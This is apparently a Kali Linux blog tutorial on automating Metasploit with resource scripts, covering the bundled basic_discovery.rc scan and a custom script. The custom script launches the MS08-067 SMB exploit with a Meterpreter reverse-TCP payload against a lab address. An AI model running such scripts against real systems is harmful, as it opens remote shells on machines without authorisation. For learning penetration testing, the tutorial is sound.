Metasploit -- Automation of Metasploit



There are many ways automation in Metasploit. We are discussing about resource script in our tutorial.

A resource script is actually a bunch of commands that runs in an automatic way when the scripts loaded. Metasploit already have a set of preconfigured scripts that is very useful in pentesting. WE can see the list of those scripts in the /usr/share/metasploit-framework/scripts/resource directory. Go to this directory by using file manager or command line in terminal. Open terminal window type following command to go to that directory :

cd /usr/share/metasploit-framework/scripts/resource
Then type ls command to see the lists of files. Screenshot is following:


Now we are going to learn how to use those scripts.

We start metasploit using msfconsole command.

msfconsole

 We have opened metasploit in previous post like the following screenshot:


Some scripts need to set RHOSTS , so we set RHOSTS  by using following command.

set RHOSTS 172.18.0.0/24
The output of this command is following:


Now we run an automated metasploit script using following command:

resource /usr/share/metasploit-framework/scripts/resource/basic_discovery.rc

This script will do a basic host discovery scan on the given subnet . The screenshot is following:


How to make own custom resource script

Now we are going to learn how to write a basic custom resource script.

We open up any text editor in our Kali Linux machine and type/paste following text.

use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.15.15
set LHOST 192.168.15.20
set LPORT 4444
exploit -j

Actually we typed all the commands we would want Metasploit Framework to execute.

Then we are saving the in Desktop with any name we are giving the file name demoscript.rc metasploit automation scripts must save with a .rc extension.

Now we start the Metasploit Framework by putting following command in terminal:

msfconsole
Then we start our custom automation script in Metasploit using following command:

resource /root/Desktop/demoscript.rc


Resource Script is not only way of automating Metasploit , we can learn about all six ways of automating Metasploit in this article at https://blog.rapid7.com/2011/12/08/six-ways-to-automate-metasploit/
Metasploit -- Automation of Metasploit Metasploit -- Automation of Metasploit Reviewed by Kali Linux on February 22, 2019 Rating: 5

No comments:

Powered by Blogger.